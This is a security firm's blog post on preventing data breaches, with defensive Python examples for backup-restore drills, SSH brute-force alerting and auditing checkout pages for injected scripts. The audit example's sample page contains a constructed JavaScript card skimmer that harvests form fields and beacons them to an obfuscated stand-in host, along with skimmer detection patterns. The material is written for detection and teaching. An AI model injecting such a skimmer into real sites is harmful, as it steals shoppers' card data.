
2021 Data Breach Forensic Predictions and What Happened in 2020: Part 3

Tips to avoid data breaches due to organizational vulnerabilities

The likelihood that a vulnerability will be exploited increases when proactive measures are not taken to continually address gaps in security.


Security awareness and training

Promoting security awareness and training is the most effective thing you can do to address the largest security problem: your employees. This can be challenging for two main reasons. First, it can be difficult to engage every employee regardless of position or role in the company. Even so, company-wide participation in security awareness should be non-negotiable.

In a recent data breach investigation, a Senior VP browsing from home over his home Wi-Fi visited websites that compromised his laptop. When he later logged into the corporate environment, the compromise spread from the laptop into corporate systems. Everyone, regardless of title, is susceptible to threats.

Second, security awareness covers a broad range of potential vulnerabilities, both digital and physical. Even though security awareness can be difficult to get started in your company, it is worth the effort to make it, and security best practices generally, an integral part of your company culture.

Additionally, teach your employees to challenge anything that seems out of the ordinary. In training, focus specifically on recognizing phishing emails, spoofed sender addresses, and social engineering attempts. Phishing campaigns have become much more sophisticated in recent years, and employees need to see what they actually look like in the wild.

Validation is a key practice for preventing phishing scams. Validate a message through a different channel than the one it arrived on: if you are trying to validate an email, make a phone call to a number you already have on file, send a text, or talk in person to confirm that the request is genuine. Replying to the suspicious email, or calling a number it supplies, only puts you back in contact with the attacker.

It is also appropriate to train on SMS text scams, as these are becoming more common. In a recent attempt, an employee was buying an item from an online classified ad. The "seller" said he had sent the employee a code and asked the employee to send it back "to make sure he wasn't a scammer." The code was in fact the employee's own Google account verification code; handing it over would have let the scammer log in as him. The employee's first instinct was to be helpful and prove he was not a scammer, but luckily he realized in time that he was the one being scammed. The lesson to teach is simple: a verification code is never shared with anyone, whatever the reason given.

It's easy to forget physical security, but it can be just as important as digital security. A company's security posture is often obvious to those who know what to look for. For example, if a SecurityMetrics team arrives at a breached franchise location and the franchisee has not been notified by corporate management that we are coming, or if they immediately give us access to their computer systems without attempting to verify our authorization, it is a good indication that communication and security awareness are lacking. Clear communication about security or technical maintenance visits needs to be standard practice.

Double-check with management before giving anyone access to locations or devices in your company. Simple measures such as locking devices, proper storage and disposal of physical records, and limiting building access or building hours are other ways to reinforce good security practice. With personal devices and BYOD policies more common than ever, security awareness is essential to protecting your company's network and data.

Incident response training

Develop and maintain formal written policies and procedures for incident response (IR) at your company. These policies are essential both to employees in the case of a suspected data breach and to the responders working to manage the incident. Identify the members of the Incident Response Team, train them on their individual roles in the event of a suspected breach, and then test the team with mock drills based on scenarios that could realistically affect your network or systems. The benefit of maintaining a trained incident response team is that you can test your security and find gaps before you experience an attack on your assets.

Test your incident response plan with tabletop exercises that walk the plan from start to finish. This gives you the most insight into the process: where the plan ends, where it has gaps or holes, and what you need to change.

Have your Incident Response Team run a regular drill that involves restoring data from backups. Evaluate your ability to restore your systems from backups (this is especially useful when recovering from a ransomware attack). Find out what data did not recover, and what other difficulties came up during the exercise, and then remedy them during "peace time," so that if you ever have the misfortune of falling victim to ransomware, your IR Team will be prepared to restore your systems without having to negotiate with the attackers.

In a recent ransomware attack, it took a company three days to restore from backups. Those three days cost the company tens of millions of dollars in revenue because they could not accept credit cards across hundreds of their stores. Backups are critical in all aspects of your business. 

Disconnect your backups except while a backup is actively running. In many of our ransomware cases, the backup was encrypted along with everything else because it was reachable from the network. Make sure your backup media is not connected to your network full-time, and keep at least one copy offline.
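As an added example (not code from SecurityMetrics or the author of this post), the following Python script automates the core of the restore drill described above: it records a SHA-256 manifest of the data when the backup is taken, then compares a restored copy against that manifest and reports what is missing, corrupted or unexpected. The directory layout, file names and contents are constructed for the example.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Hash a file in chunks so large database files do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict[str, str]:
    """Map every file under root (path relative to root) to its SHA-256.
    Record this at backup time and store it separately from the backup itself."""
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def verify_restore(manifest: dict[str, str], restored: Path) -> dict[str, list[str]]:
    """Compare a restored tree against the manifest taken when the backup was made."""
    actual = build_manifest(restored)
    return {
        "missing": sorted(k for k in manifest if k not in actual),
        "corrupted": sorted(k for k in manifest if k in actual and actual[k] != manifest[k]),
        "unexpected": sorted(k for k in actual if k not in manifest),
    }


def run_drill() -> dict[str, list[str]]:
    """Constructed drill: back up a small tree, simulate a lossy restore, report the gaps."""
    with tempfile.TemporaryDirectory() as tmp:
        src = Path(tmp) / "pos-server"          # hypothetical source system
        (src / "db").mkdir(parents=True)
        (src / "db" / "transactions.db").write_bytes(b"constructed sample data " * 100)
        (src / "db" / "index.dat").write_bytes(b"\x00\x01\x02")
        (src / "config.ini").write_text("[pos]\nstore_id=0042\n")
        manifest = build_manifest(src)           # taken at backup time

        restored = Path(tmp) / "restored"        # what came back from the backup media
        (restored / "db").mkdir(parents=True)
        (restored / "config.ini").write_text("[pos]\nstore_id=0042\n")
        # Truncated copy: the backup job was interrupted part-way through this file.
        (restored / "db" / "transactions.db").write_bytes(b"constructed sample data " * 99)
        # index.dat never came back, and a stray file that was never backed up is present.
        (restored / "READ_ME.txt").write_text("not part of the backup\n")
        return verify_restore(manifest, restored)


if __name__ == "__main__":
    for kind, files in run_drill().items():
        print(f"{kind}: {files or 'none'}")
```

Treat a non-empty "missing" or "corrupted" list as a failed drill and fix the backup job before you need it. Because the manifest is generated from the live data before the backup runs, it has to be stored somewhere ransomware cannot reach (offline, or on the same disconnected media as the backup), or it will be encrypted along with everything else and the drill will have nothing to compare against.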

Updates and patches

Neglecting security updates and patches can lead to serious problems. Never let software run past its end-of-life (sunset) date, after which the vendor stops releasing fixes. In recent years hundreds of businesses have suffered data breaches because security patches their ecommerce software provider had released were never installed.

The remedy was available. Those breaches, which cost the businesses tens of thousands of dollars each, should not have happened.

Vulnerability scans and pen tests

Proper security testing helps you identify problems in advance. Penetration testing and external vulnerability scans by a PCI Approved Scanning Vendor (ASV) are required for organizations that process credit cards under PCI DSS, and both belong in a robust, layered security program. A scan or test only helps if someone owns the findings and fixes them.

Configure and review logs

Logs can help prevent and detect data breaches, but only with consistent vigilance. Failing to review security logs lets breaches go unnoticed for much longer.

SecurityMetrics had a case where a company ran a sophisticated intrusion detection system (IDS) that was working well. At one point the IDS started issuing intrusion alerts, but no one at the company was reviewing them. What should have been a one-day breach spread across 800 locations and went undetected for nine months. Assign someone to review security logs on a regular schedule, and better still, have high-severity events automatically pushed (for example by text message) to the responsible individual.

Normalcy bias is also an issue: employees assume the logs contain no indicators of a breach because they have never seen one before. Often this is because they were never trained to spot discrepancies. Many times in an investigation we find evidence of the breach in the logs and present it to the company; they simply did not have the skills to recognize that an attack was underway.

Keeping a trained employee in charge of reviewing the logs is essential to detecting security breaches early on. 

Passwords and account credentials

Hardened passwords remain important, but the username can also be a weakness. Avoid usernames such as Admin or Administrator: a predictable username hands an attacker half of the credential pair they need, and attackers will always try to brute-force the password for the "Admin" account. Rename or disable default accounts, and lock out or throttle repeated failed logins so that guessing is slow and noisy.

Passwords should be long and complex. Strong passwords alone do not ensure security, however: multi-factor authentication should be considered a requirement on your network. Even though attackers occasionally find a way around it (the SMS code scam described above is one such way), multi-factor authentication is still one of the best ways to strengthen access security.
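The two recommendations above, review your logs and expect attackers to hammer default account names, come together in a small alerting routine. The following is an added example, not the IDS from the case described earlier or any SecurityMetrics tool: it reads OpenSSH-style authentication log lines, flags any attempt against a default account name, raises a brute-force alert when one source exceeds a failure threshold inside a time window, and escalates if that same source later logs in successfully. The log lines, hostnames, IP addresses and thresholds are all constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Optional

DEFAULT_ACCOUNTS = {"admin", "administrator", "root"}   # names attackers try first
THRESHOLD = 5                                          # failures per source ...
WINDOW = timedelta(minutes=2)                          # ... inside this window

# OpenSSH password-auth lines; "invalid user" appears when the account does not exist.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)"
)

# Constructed sample lines, not taken from a real investigation.
SAMPLE_LOG = [
    "Jan 14 02:11:03 pos-gw sshd[1201]: Failed password for admin from 203.0.113.7 port 51122 ssh2",
    "Jan 14 02:11:05 pos-gw sshd[1201]: Failed password for invalid user administrator from 203.0.113.7 port 51124 ssh2",
    "Jan 14 02:11:08 pos-gw sshd[1203]: Failed password for root from 203.0.113.7 port 51130 ssh2",
    "Jan 14 02:11:40 pos-gw sshd[1210]: Accepted password for jsmith from 10.0.0.5 port 40022 ssh2",
    "Jan 14 02:12:01 pos-gw sshd[1215]: Failed password for admin from 203.0.113.7 port 51140 ssh2",
    "Jan 14 02:12:02 pos-gw sshd[1215]: Failed password for admin from 203.0.113.7 port 51141 ssh2",
    "Jan 14 02:12:04 pos-gw sshd[1215]: Failed password for admin from 203.0.113.7 port 51142 ssh2",
    "Jan 14 02:12:30 pos-gw sshd[1219]: Failed password for jsmith from 10.0.0.5 port 40030 ssh2",
    "Jan 14 02:12:41 pos-gw sshd[1222]: Accepted password for admin from 203.0.113.7 port 51150 ssh2",
    "Jan 14 02:13:00 pos-gw CRON[1230]: (root) CMD (run-parts /etc/cron.hourly)",
]


def parse(line: str) -> Optional[dict]:
    """Return the authentication event on this line, or None for unrelated lines."""
    m = LINE_RE.search(line)
    if not m:
        return None
    return {
        # syslog timestamps carry no year; good enough for measuring gaps within a day
        "ts": datetime.strptime(m["ts"], "%b %d %H:%M:%S"),
        "ok": m["result"] == "Accepted",
        "user": m["user"],
        "src": m["src"],
    }


def review(lines: list[str]) -> list[dict]:
    """Walk the log once and emit alerts in the order the evidence appears."""
    alerts: list[dict] = []
    failures: dict[str, deque] = defaultdict(deque)  # src -> timestamps of recent failures
    bruteforcers: set[str] = set()
    seen_default: set[tuple[str, str]] = set()
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        key = (ev["src"], ev["user"].lower())
        if key[1] in DEFAULT_ACCOUNTS and key not in seen_default:
            seen_default.add(key)
            alerts.append({"severity": "medium", "type": "default-account-attempt",
                           "src": ev["src"], "user": ev["user"]})
        if ev["ok"]:
            # A login from a source already seen brute-forcing is the worst case.
            if ev["src"] in bruteforcers:
                alerts.append({"severity": "critical", "type": "success-after-bruteforce",
                               "src": ev["src"], "user": ev["user"]})
            continue
        q = failures[ev["src"]]
        q.append(ev["ts"])
        while q and ev["ts"] - q[0] > WINDOW:      # drop failures outside the window
            q.popleft()
        if len(q) >= THRESHOLD and ev["src"] not in bruteforcers:
            bruteforcers.add(ev["src"])
            alerts.append({"severity": "high", "type": "bruteforce",
                           "src": ev["src"], "count": len(q)})
    return alerts


if __name__ == "__main__":
    for a in review(SAMPLE_LOG):
        print(a)   # in production, hand high/critical alerts to a pager or SMS gateway
```

The point of the "success-after-bruteforce" rule is that the login the company in the IDS case would most need to see is the one that looks normal on its own. Run something like this on a schedule against the real log source, route the high and critical alerts to a person, and keep the medium ones in a daily digest so the reviewer learns what ordinary background noise looks like.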

Role-based access

A CEO, most of the C-suite, and senior VPs probably do not need admin-level access. They may ask for it and believe they need it, but for their job functions they likely don't. When configuring access, ask "Does this person need this access to do their job?" If the answer is no, don't grant it.

Role-based access is usually thought of in terms of data stored in systems and the group policies that govern it, but it extends further. With the shift to online meetings, role-based access takes on a more organic meaning. Are all the attendees supposed to be there? Does their role entitle them to be there? Are there unknown attendees dialing in from cell phones? The meeting moderator is responsible for questioning who is in the meeting and why, and for taking action if something seems suspicious.

Network segmentation

The days of thinking of security as a moat around a castle are gone. Segment your sensitive information and corporate secrets into the smallest areas possible. That information needs the smallest footprint possible so you can surround it with the most specialized security available.

In traditional networks, segmentation is often hardware-based (separate switches, VLANs, firewalls between zones). Zero-trust networks rely instead on policy- or software-based segmentation, where every request is authenticated and authorized regardless of where on the network it originates.

Even if you use cloud services, you still need to segment your part of the castle. If you keep sensitive files in the cloud, make sure they are encrypted or otherwise protected with elevated controls.

Encryption and backup

Securing your data is critical to your business, so encrypt as much of it as is practical. The goal is to make any information an attacker captures difficult or impossible to use. Encryption of stored credit card numbers is required under PCI DSS, but it should also be applied to other sensitive data such as protected health information and personally identifiable information. Keep in mind that encryption only helps if the keys are stored and managed separately from the data they protect.

One last security recommendation: Addressing ecommerce shopping cart attacks

We have seen increasing sophistication in JavaScript code injection in ecommerce shopping cart environments. Very few tools on the market help with this problem, and manually searching website code for injected scripts requires training and expertise.

In one ecommerce skimming investigation, we observed over 250 legitimate connections during the shopping cart and checkout process. Since then, our team has created a patented tool that can handle the complexity of a dynamic shopping cart environment and help merchants stop credit card skimming.
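For merchants who need a starting point, here is an added example (not the patented SecurityMetrics tool, and not code from the original post) of the manual review described above, automated for a captured copy of the checkout page: it lists every script the page loads, flags external scripts from hosts outside an allowlist, and flags inline scripts whose hash is not in a known-good baseline, annotating them with indicators commonly seen in skimmers (base64 decoding, form-field harvesting, image-beacon exfiltration). The HTML, host names, baseline and the skimmer snippet are all constructed for the example.

```python
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts a script may legitimately be loaded from on this (hypothetical) checkout page.
ALLOWED_HOSTS = {"shop.example", "js.payment-provider.example"}

# Inline scripts the page is known to carry, identified by SHA-256 of their stripped body.
BASELINE_INLINE = ['window.cartId = "abc123";']
KNOWN_INLINE = {hashlib.sha256(s.strip().encode()).hexdigest() for s in BASELINE_INLINE}

# Illustrative skimmer indicators; a real review would tune and extend this list.
SUSPICIOUS = [
    (re.compile(r"\batob\s*\("), "base64 decoding (obfuscated strings)"),
    (re.compile(r"String\.fromCharCode"), "char-code string building"),
    (re.compile(r"querySelectorAll\(\s*[\"']input|\.value\b"), "form field harvesting"),
    (re.compile(r"new\s+Image\s*\("), "image beacon exfiltration"),
]


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self) -> None:
        super().__init__()
        self.external: list[str] = []
        self.inline: list[str] = []
        self._in_script = False
        self._buf: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def audit(html: str, allowed_hosts: set[str], known_inline: set[str]) -> list[dict]:
    """Report scripts that are not part of the page's sanctioned baseline."""
    collector = ScriptCollector()
    collector.feed(html)
    findings: list[dict] = []
    for src in collector.external:
        host = urlparse(src).netloc.lower()
        if host and host not in allowed_hosts:       # relative URLs are first-party
            findings.append({"kind": "unknown-script-host", "detail": src})
    for body in collector.inline:
        digest = hashlib.sha256(body.strip().encode()).hexdigest()
        if digest not in known_inline:
            findings.append({
                "kind": "new-inline-script",
                "detail": digest[:16],
                "indicators": [label for rx, label in SUSPICIOUS if rx.search(body)],
            })
    return findings


# Constructed checkout page: two sanctioned scripts, one unsanctioned host, one known
# inline script, and one injected skimmer. The base64 string is a placeholder.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script src="https://shop.example/js/cart.js"></script>
<script src="https://js.payment-provider.example/v1.js"></script>
<script src="https://cdn.example-analytics.net/tag.js"></script>
<script>window.cartId = "abc123";</script>
</head><body>
<form id="checkout"><input name="cc-number"><input name="cc-cvv"></form>
<script>
(function(){var f=document.querySelectorAll("input"),d="";
for(var i=0;i<f.length;i++){d+=f[i].name+"="+f[i].value+"&";}
new Image().src=atob("aHR0cHM6Ly9leGZpbC5leGFtcGxlL2c=")+"?q="+btoa(d);})();
</script>
</body></html>
"""

if __name__ == "__main__":
    for f in audit(SAMPLE_CHECKOUT_HTML, ALLOWED_HOSTS, KNOWN_INLINE):
        print(f)
```

This only covers what is in the page source at capture time. Skimmers are frequently injected at runtime by one of the sanctioned scripts, or served only to certain visitors, so the same comparison should also be run on the scripts a real browser session actually executes, and for external scripts on their fetched content (or Subresource Integrity hashes) rather than just their host. That runtime view, across the hundreds of connections a checkout makes, is what the dynamic environment in the paragraph above refers to.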

If you haven’t already, check out part 1 and part 2 of this series for more insight on 2020 and best practices for cybersecurity. 


By: David Ellis
VP, Investigations
CISSP, QSA, PFI